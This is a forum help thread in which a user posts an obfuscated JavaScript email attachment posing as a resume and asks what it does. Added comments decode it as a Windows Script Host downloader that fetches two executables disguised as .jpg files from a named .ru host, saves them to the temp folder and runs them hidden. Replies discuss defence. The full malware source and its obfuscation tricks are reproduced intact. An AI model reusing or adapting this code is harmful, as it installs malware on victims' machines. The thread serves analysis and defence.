Malicious javascript pretending to be a resume: What does this script do?

Hi guys,

I am not sure what the policy is about posting this sort of thing here, so fair warning: this code is suspected to be malicious in nature, as it came via email in a zip file pretending to be a resume.

I was hoping someone could tell me what this code was trying to do. I have a tiny bit of experience with JavaScript and scripting in general, but most of this code is unrecognisable to me.
// ANALYST NOTES (added for review; the code is left exactly as posted).
// This is a Windows Script Host (.js attachment) downloader. Every ActiveX
// ProgID, method name and URL is assembled from a junk string that a later
// .replace(/[...]/g, "") strips back down. Method names such as "replace" are
// obtained by rendering a large integer in base 35 with Number#toString(35):
// 8*6300863351+1 = 50406906809, which in base 35 is the string "replace".
// The many `var xxxx=(...)` numeric assignments and most short string
// assignments are never read again; they appear to be padding to defeat
// signature matching.
// Control flow: under wscript/cscript `window` is not defined, so the first
// try{} throws; the second try{} builds a ProgID that decodes to the nonsense
// "ewrgve" and throws too. The real payload is T_Kw, defined and called from
// the innermost catch — so it appears to run only when double-clicked under
// WSH, not in a browser (where window["wbrtbr"] is just undefined).
// hyan decodes to new ActiveXObject("WScript.Shell").
(function(){var BKah=(27.0+"HKGbcL8gW\x82u"["charCodeAt"](5)*0);iaqm=(2.0+"?s\x86}|ZA:*\x894H9"["length"]*20);var n7Er=("J\x82j\x85m\x81;\x86&gs('6tbf%"["charCodeAt"](8)*11+34.0);try{var vStb=window["g1wUbdrLt~bqr"[("U#)_/k?B"["length"]*6300863351+1.0)["toString"](("p\x8ax}?d*Rt{-I].+i7r_\x7f"["charCodeAt"](6)*0+35.0))](/[gLq\~Ud1]/g,"")];var vS_J=(":W)o7j}B\x82h\x81X8;u"["charCodeAt"](12)*5+29.0);oNNc=(2*"\x89)Z\x60Xh\x81-\x8b"["charCodeAt"](2)+24.0);}catch(ee){try{var lFPZ=new ActiveXObject("*eIw<rtgdEvH1e"[("{=isQt-7/\x87>eBIW6F"["charCodeAt"](7)*1084775147+33.0)["toString"](("W\x80\x833[ai"["length"]*5+1.0))](/[\<d1E\*HtI]/g,""));S0vk=("W7_6*vO\x83nU(-gZ"["length"]*23+8.0);}catch(eee){function T_Kw(fr, gadK, rn){ var hyan = new ActiveXObject("+WTSJcIr[i==pvt/w.7~SohVe~lAl"["replace"](/[\+7\[vV\~TJIoA\=\/w]/g,""));var OUoS=(48*"#@}6Y\x82;So2"["length"]+1.0);
// gadK := WScript.Shell.ExpandEnvironmentStrings("%TEMP%") + "\" (String.fromCharCode(92))
// + the filename argument, i.e. the dropped file lands in the user's temp directory.
var gadK = hyan["E"+"xpandEnvironmentS"+(65>20?"\x74":"\x6f")+"rings"]("u%oWTjE=MYHP*%"[(720098668*"w%:$FNn7#(GU\x8b{x)"["charCodeAt"](4)+49.0)["toString"]((0*"8\x846]T\x87i[tvg"["charCodeAt"](7)+35.0))](/[\=jouYH\*W]/g,"")) + String["fr"+(83>1?"\x6f":"\x68")+"mCh"+""+(83>31?"\x61":"\x59")+"rCode"](92) + gadK;var Cvii="#P*F`(I;lGYgDT>x;PNp(Aq"["replace"](/[\>NTgA\;\`\#\*\(G]/g,"");
// YThL decodes to new ActiveXObject("MSXML2.XMLHTTP") — the HTTP client used for the download.
var YThL = new ActiveXObject("cM-hSEX1vMZL[2m.5X+MrL8HuT<TsP"[("3R)0v"["length"]*3273117743+4.0)["toString"](("\x86\x84$j\x82e+#D(X\x874a*rn8\x89o"["charCodeAt"](9)*0+29.0))](/[m\[\-8rhEsZv\<\+u51c]/g,""));Fdbq="bB`/39cFyq;V&=lE5(j_pvMt"[(4.0+"Ul\x86Jn"["length"]*8476012186)["toString"]((34.0+"W\x7fn.y?\x846:k1t+s"["charCodeAt"](5)*0))](/[\/\(M9FEy\`\_\;\=b\&p]/g,"");
// onreadystatechange handler: once readyState === 4 (response complete) the
// body is written to disk through GkqB = new ActiveXObject("ADODB.Stream").
YThL["o"+(85>27?"\x6e":"\x68")+"re"+"ad"+(86>22?"\x79":"\x70")+"statechange"] = function (){ if (YThL["rea"+(69>21?"\x64":"\x5d")+"ySt"+"a"+(62>30?"\x74":"\x6f")+"e"] === 4){ var GkqB = new ActiveXObject("7IAID]O1DNBI.lS3t@#r;EeN9aHm"[("T\x83_}-|w<tp7"["length"]*5423875738+0.0)["toString"]((4*">Jv/\x83xEZj"["length"]+0.0))](/[lI13\;9EH\#\@7\]N]/g,""));var RS_j="!pkwb3)WyK#5l0wVENpg9L"[(1.0+">3&w\x8a4C"["length"]*2863432339)["toString"](("/G?K{@\x88'\x80JLW5_\x8bp>"["charCodeAt"](12)*0+30.0))](/[bEwlp\#9y\!\)]/g,"");
// stream.open()
GkqB["o"+""+(98>36?"\x70":"\x69")+"en"]();hMoj="WIedMxbyo)CdT(N<9-U7N"["replace"](/[Wed7\<\-y\(\)x]/g,"");n6ZZ=("3.\x80x*PDHhq(S\x87i[\x83"["charCodeAt"](4)*9+40.0);var z_ox=("v[j(7"["length"]*76+1.0);bbQk="3Vjhx8JOz6NGnWPBo<Mot)C"[(646242394*"a<\x8a_s[\x84Lv\x86\x82@=N\x80zg"["charCodeAt"](13)+77.0)["toString"](("]Vt\x8b\x89h~^G-(?"["charCodeAt"](8)*0+35.0))](/[Njx3PO\)6J\<no]/g,"");var gvTb=(9.0+"3*\x85r4\x82bk\x80\x89Nt/"["length"]*27);var vtJw="`a4fv68s[z/&y]kAn59Ma"["replace"](/[Av548M\&\]\[\/\`]/g,"");
// stream.type = 1 (ADODB adTypeBinary): raw bytes, no text conversion.
GkqB["t"+"yp"+(54>5?"\x65":"\x5b")+""] = 1;var dXJt="(DVFQ0G]QvnhZ9R=SMzrT-I"[(1120153484*"'\x89\x83Ce\x8al\x80ZMRxO5cio-h\x8b"["charCodeAt"](17)+29.0)["toString"]((0*"gz\x89\x87\x82AJFE_\x8aiN"["charCodeAt"](8)+35.0))](/[0V\=h\]v\(\-9zFrS]/g,"");
// stream.write(xmlhttp.ResponseBody) — the downloaded bytes.
GkqB["w"+"rit"+(52>2?"\x65":"\x5c")+""](YThL["Resp"+(74>46?"\x6f":"\x68")+"nseBo"+"d"+(69>37?"\x79":"\x6f")+""]);F81g=("\x81+\x87q/p\x82*[Sb"["length"]*36+9.0);g5XT="RL0Q<zkWR5Y`K*mka92I-er"["replace"](/[e29\-\<Rk\*0\`Y]/g,"");var JiWj=(10.0+"H@\x8ae\x86\x81D;I1i"["charCodeAt"](6)*1);
// stream.position = 0 (rewind before saving)
GkqB["p"+(64>31?"\x6f":"\x65")+""+"siti"+(80>7?"\x6f":"\x6a")+"n"] = 0;pp3E="oyPngts4LIiH[LXHrScZmUb"["replace"](/[\[I4PUXZtHSon]/g,"");
// stream.saveToFile(gadK, 2): 2 = adSaveCreateOverWrite, so any existing file at that path is clobbered.
GkqB["sav"+(55>7?"\x65":"\x5b")+""+""+(98>44?"\x54":"\x4b")+"oFile"](gadK, 2);var aLTe=("0'Adz\x60MB*#/;1"["charCodeAt"](8)*4+20.0);var nLha="P8EG=X<huCH&gno1Unrwh+h"[(16.0+"qPB/78-5z*\x83&ijT2"["charCodeAt"](7)*556371782)["toString"]((2*"_@H^(?Z51KPyN"["length"]+6.0))](/[G\&w1H\=u\+P8n\<]/g,"");o$dG=("VM6ySLTE>ZYu\x7fvJ[_"["charCodeAt"](2)*0+15.0);var D15G=(2.0+"to5XbxJ"["length"]*47);
// stream.close()
GkqB[""+(87>27?"\x63":"\x5a")+"lo"+""+(53>34?"\x73":"\x6d")+"e"]();Cvpn="M`p~0U+7L_uJBZSniT%m~9[w"["replace"](/[iu\%\+\~0MB\[\`7\_S]/g,"");
} ;T5gx="OA1P#Mhp8k2El6VOgR+i1M"[(3027147209*"<$L+}w42Ta~GfX"["length"]+8.0)["toString"]((34.0+"OB*\x85sV&\x7fy0E@d)\x86<g"["charCodeAt"](10)*0))](/[1g86hEO\+\#k]/g,"");
} ;var Jx8n="*4=b&~L%Qx&-COCKU#h-stTe"[("Y0T8QC\x881Aj%Ub57n"["charCodeAt"](5)*890487061+31.0)["toString"]((0*"g\x80dw\x7f>D~&W]H\x85Q\x8b"["charCodeAt"](6)+36.0))](/[s\*\#TO\%\&\=\-KQ\~]/g,"");var ZC3Q=(36.0+"CAwD\x81-tp2}\x824"["charCodeAt"](8)*6);var eLzP=("UzP+h4\x60\x84FHYO?("["length"]*20+11.0);Bs7c="2Aez6DwLnS~Lu*x3s1plM>M"[(0.0+"QO\x82Y\x60*"["length"]*7063343489)["toString"]((4.0+"P\x8079^C"["length"]*5))](/[ez1\~wn\*3ul\>2D]/g,"");w$2g=(5*"[Pyw;NKh9met{p1\x80Ya"["charCodeAt"](14)+40.0);var gryB=(6.0+"\x60[S9e\x89?DGY+-8"["length"]*0);var nKTq="<R[Xpk&&F<l&eI6Ws_tDi*Q0"[("M>U\x7f\x8b0RjizoA"["length"]*2032260927+9.0)["toString"](("vo\x89M&bnrI\x82L)6>*@jBOe"["charCodeAt"](11)*0+31.0))](/[\[6Q\<esp\_D\*\&]/g,"");
// xmlhttp.open("GET", fr, false): "wGvE!T" minus [v!w] is "GET"; false = synchronous request.
try { YThL["op"+(90>29?"\x65":"\x5d")+""+"n"]("wGvE!T"[("t^m\x88d"["length"]*10081381361+4.0)["toString"]((1*"npUZ+@&\x82L^{=#\x85"["charCodeAt"](12)+0.0))](/[v\!w]/g,""), fr, false);var Dtcc="LsVu/CH7SDET4m/E6oO9Zrya"["replace"](/[yZD\/4VoEHL97]/g,"");
// xmlhttp.send()
YThL[""+""+(51>8?"\x73":"\x6c")+"end"]();XYxF="cF_9%X-nJ8sI+eW7eFb6EvgQ"[(3027147209*"iX2u}-TA&$z:3{"["length"]+8.0)["toString"](("1CEvd:\x85-Rg5*\x60"["length"]*2+8.0))](/[veJ\-6g\+\%s\_cb7]/g,"");
// If rn > 0: WScript.Shell.Run(gadK, 0, 0) — window style 0 = hidden, no wait on return.
if (rn > 0){ hyan["R"+(90>39?"\x75":"\x6d")+""+"n"](gadK, 0, 0);DhDg="XV/6;mND/1OjQ<_I&otU8(W"["replace"](/[OUt\_j\/\&\;\<XN\(]/g,"");
} ;var Ssra=(13.0+"y:a;\x85Z=g,ch+rm@"["length"]*22);
// Any failure (no network, ActiveX blocked, write denied) is swallowed silently.
} catch (er){ } ;var I9Hr="W6pUh#mPI_BTsjQ5&mwVZK"[(672092090*">(Y+\x60KLAQ}"["charCodeAt"](5)+59.0)["toString"](("1gvm/u|U"["length"]*4+3.0))](/[\_\&Wj5w\#PpZhT]/g,"");
// Two invocations. Hand-decoding the replace() calls gives (defanged; confirm
// in a sandbox before acting on it):
//   1) hxxp://ellison1[.]ru/images/one.jpg  -> %TEMP%\3965211.exe, run hidden
//   2) hxxp://ellison1[.]ru/images/two.jpg  -> %TEMP%\5226509.exe, run hidden
// The ".jpg" extension is cosmetic: the bytes are saved and executed as .exe.
// Defender take-aways: block the host at proxy/DNS; alert on wscript.exe
// started from a mail/zip path, and on the chain MSXML2.XMLHTTP ->
// ADODB.Stream.SaveToFile into %TEMP% -> process start from %TEMP%.
} T_Kw("Yh9tTt`pN]:0/#W/>e(lVlzi!sDoRnS1R.*Gr~u>U/-iLmq%a*-g2eWs`/!o-n%-ed.*j4p[bg"[(0.0+"_\x81L'<xc"["length"]*7200986687)["toString"]((0.0+"PemYZ"["length"]*7))](/[\>9Vbd\(S\~\*\#DUTq\-\[L0G2zNR\%Y\`\]W\!4]/g,""),"r3@9r6f5E2T1c1o.VeZbxv_e"["replace"](/[EfcbV\_\@vZrTo]/g,""), 1);M2_r=(54.0+"W\x8a1\x81zYFGjdEl\x86I"["charCodeAt"](13)*6);
T_Kw("(h@tIt(pR:bT/@*/%[e0lv0lMicsTo&nL1C.!)r>uCd/Xi8ymVaqg!eNsO/~tRFwEo@.+jQpzg"[(1487780792*"4Z\x86p2tm6laX"["length"]+7.0)["toString"]((29.0+"IKGeDmo9>=yf&\x88{d\x8b\x83"["charCodeAt"](2)*0))](/[\)d\[\!\@ELFI\>bMvXc\(q0C8\+\*Q\%\&N\~zVROyT]/g,""),"&5!2Y2Nu6J5K0b94.teoxOe"["replace"](/[NJ\&o4Ou\!bKtY]/g,""), 1);var Y1Zi=("\x60k\x84JNZlY;G"["length"]*30+6.0);
}};var H9rD=(21*"<qG\x83pgv]"["length"]+7.0);;var BJCo="gVhaDsYxdKyS(invL8wjQ"[(854354352*"mt}p\x87n@\x8b;\x8a"["charCodeAt"](8)+41.0)["toString"](("CSpD9hegV,"["charCodeAt"](4)*0+35.0))](/[h8yDgvdnY\(j]/g,"")})();//q0G737pZcn


My enquiring mind wants to know what this script was trying to do and how. :)

Thanks in advance.
Andrew
defectaAsked:
Dave BaldwinFixer of ProblemsCommented:
It appears to be attempting to load an ActiveX component which, depending on your Windows security settings, can potentially do just about anything. The most likely thing is loading viruses and malware off the internet to infect the machine that it is run on.
JohnBusiness Consultant (Owner)Commented:
I just delete this stuff on sight. You would know the sender if legitimate. Just delete it and move on.
defectaAuthor Commented:
I appreciate that, and I do too, but as I said, I would like to understand what it is trying to do so I can better protect our environment. I had a user who almost ran this script but thought better of it at the last second.

I would really appreciate some insight into what the purpose of this script is and what it's trying to do.

I have no question that it's malicious, I was just hoping someone with a better understanding of JavaScript could give me a summary of its intent?

Cheers.
defectaAuthor Commented:
Thanks Dave.

Is there an obfuscated IP address or something in that code? Something that could potentially be blacklisted to prevent the ActiveX component from being downloaded?
Dave BaldwinFixer of ProblemsCommented:
I don't know.  I saw this part...
var GkqB = new ActiveXObject(


which declares a new ActiveXObject, but since most of the JavaScript is encoded (and I won't run it to decode it), I can't tell where it is going to get it from.

I just noticed another ActiveXObject in the first line of the script.
Scott Fell, EE MVEDeveloper & EE ModeratorCommented:
I uploaded the file to malwr.com to check out  https://malwr.com/analysis/M2MwMGJiNjA0ZjYwNGYwZGIwYzA4MzgzNDBmNmU1ZGM/